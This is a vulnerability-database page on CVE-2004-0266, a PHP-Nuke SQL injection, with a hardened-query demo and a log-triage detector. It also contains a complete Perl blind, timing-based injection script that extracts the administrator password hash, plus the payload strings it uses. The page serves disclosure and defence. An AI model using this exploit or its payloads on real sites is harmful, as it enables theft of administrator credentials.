CVE-2004-0266
CVSS 5.0
Published: 2004-11-23 00:00:00
Revised: 2016-10-17 22:42:44

[Original] SQL injection vulnerability in the "public message" capability (public_message) for Php-Nuke 6.x to 7.1.0 allows remote attackers to obtain the administrator password via the c_mid parameter.


[CNNVD] PHP-Nuke Public Message SQL Injection Vulnerability (CNNVD-200411-090)

        The "public message" feature (public_message) of Php-Nuke 6.x through 7.1.0 contains an SQL injection vulnerability. A remote attacker can obtain the administrator password via the c_mid parameter.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:francisco_burzi:php-nuke:6.0
cpe:/a:francisco_burzi:php-nuke:7.0
cpe:/a:francisco_burzi:php-nuke:6.6
cpe:/a:francisco_burzi:php-nuke:6.5_rc1
cpe:/a:francisco_burzi:php-nuke:7.1
cpe:/a:francisco_burzi:php-nuke:7.0_final
cpe:/a:francisco_burzi:php-nuke:6.5_rc2
cpe:/a:francisco_burzi:php-nuke:6.9
cpe:/a:francisco_burzi:php-nuke:6.5_beta1
cpe:/a:francisco_burzi:php-nuke:6.5_rc3
cpe:/a:francisco_burzi:php-nuke:6.7
cpe:/a:francisco_burzi:php-nuke:6.5
cpe:/a:francisco_burzi:php-nuke:6.5_final

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0266
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0266
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-090
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=107635110327066&w=2
(UNKNOWN)  BUGTRAQ  20040208 [waraxe-2004-SA#003] - SQL injection in Php-Nuke 7.1.0
http://www.securityfocus.com/bid/9615
(VENDOR_ADVISORY)  BID  9615
http://xforce.iss.net/xforce/xfdb/15080
(VENDOR_ADVISORY)  XF  phpnuke-publicmessage-sql-injection(15080)

- Vulnerability information

PHP-Nuke Public Message SQL Injection Vulnerability
Medium  SQL injection
2004-11-23 00:00:00 2005-10-20 00:00:00
Remote
        The "public message" feature (public_message) of Php-Nuke 6.x through 7.1.0 contains an SQL injection vulnerability. A remote attacker can obtain the administrator password via the c_mid parameter.

- Advisories and patches

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (23670)

PHP-Nuke 6.x/7.x Public Message SQL Injection Vulnerability (EDBID:23670)
php webapps
2004-02-09 Verified
0 Janek Vind
N/A
source: http://www.securityfocus.com/bid/9615/info

It has been reported that the 'public message' feature of PHP-Nuke is affected by an SQL injection vulnerability. The issue is due to improper sanitization of user-supplied parameters passed to the module. As a result, an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information.
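The flaw described above, mirrored as an added example (this is not PHP-Nuke's code and not the waraxe PoC): Python with an in-memory SQLite database stands in for the PHP/MySQL application. The decoded p_msg cookie is interpolated into a single-quoted string, so the UNION half of the PoC payload returns the pwd column of nuke_authors in place of a public message; the hardened function validates the decoded value as a numeric id and binds it as a parameter. Assumptions: the table and column names of nuke_public_messages, the four-column query shape and quoting (inferred from the payload's null,null,null,pwd), and the admin hash value are all constructed for the demo. The IF()/BENCHMARK() timing half of the payload is MySQL-only and is left out so the example runs on SQLite.

```python
"""Added example: the injection pattern behind CVE-2004-0266, vulnerable and hardened side by side."""
import base64
import re
import sqlite3

ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"   # constructed MD5 for the demo admin


def make_db():
    """Constructed stand-in tables (column names assumed, not PHP-Nuke's real schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE nuke_authors (aid TEXT, name TEXT, pwd TEXT);
        INSERT INTO nuke_authors VALUES ('God', 'God', '{ADMIN_HASH}');
        CREATE TABLE nuke_public_messages (mid INTEGER, to_uid INTEGER, content TEXT, msg_date TEXT);
        INSERT INTO nuke_public_messages VALUES (1, 0, 'welcome', '2004-02-08');
    """)
    return con


def cookie(value):
    """p_msg travels base64-encoded in the cookie, as in the PoC."""
    return base64.b64encode(value.encode("latin-1")).decode()


def vulnerable_lookup(con, p_msg):
    """Assumed shape of the flaw: the decoded cookie is dropped into a quoted string unescaped."""
    c_mid = base64.b64decode(p_msg).decode("latin-1")
    sql = f"SELECT mid, to_uid, content, msg_date FROM nuke_public_messages WHERE mid='{c_mid}'"
    return con.execute(sql).fetchall()


def hardened_lookup(con, p_msg):
    """Fix: require a plain integer id after decoding, then bind it as a parameter."""
    try:
        c_mid = base64.b64decode(p_msg, validate=True).decode("latin-1")
    except ValueError:            # binascii.Error and UnicodeDecodeError are ValueErrors
        return []
    if not re.fullmatch(r"[0-9]{1,10}", c_mid):
        return []
    sql = "SELECT mid, to_uid, content, msg_date FROM nuke_public_messages WHERE mid=?"
    return con.execute(sql, (int(c_mid),)).fetchall()


# UNION half of the PoC payload. Four columns (null,null,null,pwd) match the four
# selected columns; the trailing /* swallows the rest of the original query.
UNION_PAYLOAD = "x' union select null,null,null,pwd from nuke_authors where name='God'/*"


def demo():
    """Run both lookups against a legitimate cookie and against the payload."""
    con = make_db()
    return {
        "legit_vulnerable": vulnerable_lookup(con, cookie("1")),
        "attack_vulnerable": vulnerable_lookup(con, cookie(UNION_PAYLOAD)),
        "legit_hardened": hardened_lookup(con, cookie("1")),
        "attack_hardened": hardened_lookup(con, cookie(UNION_PAYLOAD)),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

Running it prints the four results: the vulnerable path hands back the admin hash as the fourth column of the "message", while the hardened path returns nothing for the payload because the id check rejects it before any SQL is built. Even without that check a bound parameter is compared as a literal string rather than parsed as SQL, which is the property the original code lacked.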


#!/usr/bin/perl
#
# [waraxe-2004-SA#003] PHP-Nuke 6.x - 7.1.0 "public message" blind SQL injection PoC
# (Janek Vind "waraxe", 2004-02-08).
#
# The base64 p_msg cookie is decoded and dropped into a query unescaped. This
# script recovers the admin MD5 hash one hex digit at a time: the injected
# IF(...,BENCHMARK(),1) burns server CPU only when the guessed digit is right,
# and the delay is read back from PHP-Nuke's "Page Generation: x.xxx Seconds"
# footer, so no query output has to be visible on the page.

use strict;
use warnings;
use MIME::Base64;
use IO::Socket;

#------------------------------------------------
my $logfile = "nukelog.txt";
my @chars   = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
#------------------------------------------------
my $remote = '127.0.0.1';
my $port   = 80;
my $url    = "/index.php";

# NB!! Tweak $md5times variable, to adjust the delay
# according to server's performance and latency.
my $md5times = 260000;

#------------------------------------------------
###################################
#                                 #
#  Calibration begins ...         #
#                                 #
###################################

my $logline = "----- Page generation time meanvalue will be calculated now ----- ";
print $logline . "\n";
Writelogline($logline);

my $sum = 0;

for (my $cnt = 0; $cnt < 10; $cnt++)
{
    # Well-formed but bogus admin cookie (aid:md5:): walks the same code path
    # as a real request without injecting anything, to measure the baseline.
    my $admin = "whateveraid:3974c84293fadcc0f0db9227fdd4cba3:";
    $admin = encode_base64($admin);
    $admin =~ s/=/%3d/g;
    $admin =~ s/\n//g;

    my $cookie = "lang=english; admin=" . $admin;

    my $data = MakeGetRequest($remote, $url, $cookie);
    $sum += TimeToInt(GetGenTime($data));
}

my $meantime = int($sum / 10);
$meantime = 1 if $meantime < 1;   # footer not found: avoid dividing by zero below

$logline = "Mean page generation time --> " . $meantime . "ms ";
print $logline . "\n";
Writelogline($logline);

#------------------------------------------------

my $md5hash = "";

for (my $nr = 1; $nr < 33; $nr++)
{
    for (my $cnt = 0; $cnt < 16; $cnt++)
    {
        my $charx = $chars[$cnt];

        # The payload lands inside a single-quoted string; the UNION keeps the
        # column count (4) aligned and the IF() only runs BENCHMARK() when the
        # $nr-th hex digit of the 'God' admin's pwd equals $charx. The trailing
        # /* comments out the rest of the original query.
        my $admin = "x' union select null,null,null,pwd from nuke_authors where name='God' AND IF(mid(pwd," . $nr . ",1)='" . $charx . "',benchmark($md5times,md5('r00t')),1)/*";

        $admin = encode_base64($admin);
        $admin =~ s/=/%3d/g;
        $admin =~ s/\n//g;

        my $cookie = "p_msg=$admin; ";

        my $data    = MakeGetRequest($remote, $url, $cookie);
        my $inttime = TimeToInt(GetGenTime($data));

        $logline = "pos --> " . $nr . " char --> " . $charx . " --> " . $inttime;
        print $logline . "\n";
        Writelogline($logline);

        # More than 5x slower than the calibrated mean: the guess was right.
        if (int($inttime / $meantime) > 5)
        {
            $md5hash .= $charx;
            $logline = "current md5hash --> " . $md5hash;
            print $logline . "\n";
            Writelogline($logline);
            last;
        }
    }
}

$logline = "----- Final md5hash --> " . $md5hash . " -----";
print $logline . "\n";
Writelogline($logline);

exit();


sub MakeGetRequest
{
    my ($host, $path, $cookie) = @_;
    my $socket = IO::Socket::INET->new(PeerAddr => $host,
                                       PeerPort => $port,
                                       Proto    => "tcp",
                                       Type     => SOCK_STREAM)
        or die "Couldn't connect to $host:$port : $@\n";
    print $socket "GET " . $path . " HTTP/1.0\r\n";
    print $socket "Cookie: $cookie\r\n";
    print $socket "Host: $host\r\n\r\n";

    my $buff = "";
    while (my $answer = <$socket>)
    {
        $buff .= $answer;
    }
    close($socket);
    return $buff;
}

# Pull the value out of PHP-Nuke's "Page Generation: 0.123 Seconds" footer.
sub GetGenTime
{
    my ($data) = @_;
    my $idx1 = index($data, "Page Generation: ");
    return "" if $idx1 < 0;   # error page or truncated response
    return substr($data, $idx1 + 17, 10);
}

# Keep only the digits, so "0.123 Seco" becomes 123 (roughly milliseconds).
sub TimeToInt
{
    my ($t) = @_;
    $t =~ s/[^0-9]//g;
    return $t eq "" ? 0 : int($t);
}

######################################################
sub Writelogline
{
    my ($line) = @_;
    open(my $log, ">>", $logfile) || die "Can't open $logfile\n";
    print $log $line . "\n";
    close($log);
}
######################################################




- Vulnerability information

3901
PHP-Nuke mainfile.php c_mid Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

PHP-Nuke contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the p_msg variable in the mainfile.php module is not verified properly and will allow an attacker to inject or manipulate SQL queries.
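For the defensive side, an added example that is not from this page or any vendor: the PoC carries its payload in the p_msg cookie, and the timing oracle needs up to 16 requests per hash position, so a detector can base64-decode that cookie from web logs, flag SQL metacharacters, non-numeric message ids and undecodable values, and count hits per client. The log lines below are constructed here (an Apache combined format with %{Cookie}i appended is assumed); the regexes and the per-client count are this example's own heuristics, not from any advisory.

```python
"""Added example: triage PHP-Nuke p_msg cookies in web server logs for CVE-2004-0266-style abuse."""
import base64
import binascii
import re
from collections import Counter
from urllib.parse import quote, unquote

# Decoded cookie content that points at injection rather than a numeric message id.
SQLI_RE = re.compile(
    r"(?i)(union\s+select|benchmark\s*\(|sleep\s*\(|/\*|--|\bnuke_authors\b|'\s*(?:or|and)\b)"
)
# Cookie field as it appears in the assumed log format: ... "lang=english; p_msg=<value>"
COOKIE_RE = re.compile(r'(?:^|[;"]\s*)p_msg=([^;"\s]+)')
CLIENT_RE = re.compile(r"^(\S+)\s")


def _cookie_value(plaintext):
    """Encode a cookie the way the PoC does: base64, then '=' percent-encoded."""
    return quote(base64.b64encode(plaintext.encode("latin-1")).decode(), safe="")


def _logline(ip, ua, cookie):
    return (f'{ip} - - [08/Feb/2004:12:00:01 +0000] "GET /index.php HTTP/1.0" 200 5120 '
            f'"-" "{ua}" "{cookie}"')


# Constructed sample log: one legitimate visitor, two PoC probes from the same host
# (positions 1, guesses '0' and '1'), one garbage cookie, one request without p_msg.
INJECTION = ("x' union select null,null,null,pwd from nuke_authors where name='God' "
             "AND IF(mid(pwd,1,1)='0',benchmark(260000,md5('r00t')),1)/*")
SAMPLE_LOG = [
    _logline("10.0.0.5", "Mozilla/4.0", "lang=english; p_msg=" + _cookie_value("1")),
    _logline("10.0.0.9", "libwww-perl/5.76", "p_msg=" + _cookie_value(INJECTION)),
    _logline("10.0.0.9", "libwww-perl/5.76", "p_msg=" + _cookie_value(INJECTION.replace("'0'", "'1'"))),
    _logline("10.0.0.7", "Mozilla/4.0", "p_msg=%%%notbase64"),
    _logline("10.0.0.8", "Mozilla/4.0", "lang=english"),
]


def decode_p_msg(logline):
    """Return (present, decoded); decoded is None when the value is not valid base64."""
    m = COOKIE_RE.search(logline)
    if not m:
        return False, None
    raw = unquote(m.group(1))
    try:
        return True, base64.b64decode(raw, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return True, None


def classify(logline):
    """One verdict per line; anything but a bare numeric id is worth a look."""
    present, decoded = decode_p_msg(logline)
    if not present:
        return "no-cookie"
    if decoded is None:
        return "suspicious:undecodable"
    if SQLI_RE.search(decoded):
        return "suspicious:sqli"
    if not re.fullmatch(r"[0-9]+", decoded):
        return "suspicious:non-numeric"
    return "benign"


def triage(lines):
    """Classify every line and count suspicious hits per client IP. The blind
    timing attack makes hundreds of near-identical requests from one host, so
    the per-client count separates a probe from a one-off malformed cookie."""
    verdicts = [classify(line) for line in lines]
    per_client = Counter()
    for line, verdict in zip(lines, verdicts):
        if verdict.startswith("suspicious"):
            per_client[CLIENT_RE.match(line).group(1)] += 1
    return verdicts, per_client


if __name__ == "__main__":
    verdicts, per_client = triage(SAMPLE_LOG)
    for line, verdict in zip(SAMPLE_LOG, verdicts):
        print(verdict, "<-", line[:60])
    print("suspicious requests per client:", dict(per_client))
```

The decoded-content check matters more than any pattern on the raw request line: the payload is base64 in a cookie header, so signatures that only inspect the URL or query string never see "union select" or "benchmark(".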

- Timeline

2004-02-08 2004-02-08
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Credit

Unknown or Incomplete

- Vulnerability information

PHP-Nuke Public Message SQL Injection Vulnerability
Input Validation Error  BID 9615
Remote: Yes  Local: No
2004-02-09 12:00:00 2009-07-12 02:06:00
Discovery of this issue has been credited to Janek Vind <come2waraxe@yahoo.com>.

- Affected program versions

Francisco Burzi PHP-Nuke 7.1
Francisco Burzi PHP-Nuke 7.0 FINAL
Francisco Burzi PHP-Nuke 7.0
Francisco Burzi PHP-Nuke 6.9
Francisco Burzi PHP-Nuke 6.7
Francisco Burzi PHP-Nuke 6.6
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
Francisco Burzi PHP-Nuke 6.0

- Discussion

It has been reported that the 'public message' feature of PHP-Nuke is affected by an SQL injection vulnerability. The issue is due to improper sanitization of user-supplied parameters passed to the module. As a result, an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information.

- Exploit

No exploit is required to leverage this vulnerability. The following proof of concept has been provided:

- Solution

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References

 

 
